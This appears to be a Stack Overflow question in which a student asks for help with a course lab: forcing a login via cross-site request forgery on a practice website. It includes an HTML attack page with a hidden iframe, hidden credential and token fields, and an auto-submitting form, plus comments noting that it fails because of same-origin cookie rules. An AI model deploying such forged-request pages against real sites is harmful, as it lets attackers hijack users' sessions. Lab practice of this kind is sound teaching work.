# How can I successfully perform an xss attack on a dummy website?

Tags: javascript, php, html, xss, setcookie

in my security course, we were told to practice an xss attack using firefox on this website;

```
http://permalink.co/
```

No worries, this is a website specifically setup for us to practice security. The csrf field you see should be set to 1 (for token validation, token is random) and the xss field should be set to 0 for this practice. We should write an html file and include other languages like javascript, such that when our file is executed by the browser, it should just display a blank page. But when refreshed, it should show that we are logged into the website I gave above. The username is 'attacker, and the password is 'l33th4x'.

I basically need to lock in password, username, and token. I came up with a plan to use a cookie and set the token to 'abc'. So, when I come to login, i use the username and password that I know with token=abc that I knowingly set. But my code doesn't work, I was told I need two forms, first one for setting the cookie token to 'abc' and second one for logging in using the three parameters. But I don't see what to put in the 1st form. I came up with the code below but it doesn't work, I need help;

```
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>   
<head>       
<title> set csrf to 0 and xss to 4 on http://permalink.co/ </title>        
</head>
<body>
<iframe style="border:none;width:0px;height:0px" id="iframe_submit"    name="iframe_submit"></iframe>        
<form id="form_id" action="http://permalink.co/login" method="POST" target="iframe_submit">       
<input type="hidden" name = "csrf_token" value="abc"><br>
<input type="hidden" name = "username" value="attacker"><br>        
<input type="hidden" name = "password" value="l33th4x"><br>    
</form>
<script type="text/javascript">
document.setcookie="csrf_token=abc";
document.forms["form_id"].submit();                              
</script>
</body>
</html>
```

For a first hand view of the question, visit the website below and look for number 2.1. This was due last month but I didn't understand it and exams are approaching;
    https://www.eecs.umich.edu/courses/eecs388/static/388-w15-proj2.pdf

Comment: It should be related to either http://programmers.stackexchange.com or http://codegolf.stackexchange.com/ not to stackoverflow

Comment: What is the hacklang tag doing here?

Comment: i thought it read 'hacking'. am going to edit it

Comment: @kuldeep, thanks for suggesting stack exchange, I had never used it for such questions because they all got answered here. But I will try it afterwards

Comment: @MattDathew Stackoverflow is basically to discuss & solve problems. While this question is more like a coding requirement, So I suggest to try those sites. Also http://security.stackexchange.com can be a good choice for security questions.

Comment: its kind of confusing, because this question requires coding. my coding is wrong. So when i take it to stack exchange, they will tell me that anything that deals with coding belongs to stack overflow. I have ever been told that.

Comment: Where was this html being served from? If the html you showed was not being served from the permalink.co domain, then it cannot set a cookie for the permalink.co domain. This is because cookies follow the same origin policy.